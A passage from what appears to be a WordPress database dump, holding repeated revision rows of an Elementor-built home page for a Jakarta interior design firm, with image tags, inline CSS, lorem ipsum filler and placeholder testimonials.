Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-05-25 10:48:56','2023-05-25 10:48:56','',22,'https://bauhaus.futuremediatrix.com/?p=4771',0,'revision','',0),(4772,2,'2023-05-25 10:48:56','2023-05-25 10:48:56','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n	        				<h4>\n					Home Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n	        				<h4>\n					Commercial Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-05-25 10:48:56','2023-05-25 10:48:56','',22,'https://bauhaus.futuremediatrix.com/?p=4772',0,'revision','',0),(4773,2,'2023-05-25 10:48:56','2023-05-25 10:48:56','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n	        				<h4>\n					Home Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n	        				<h4>\n					Commercial Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img 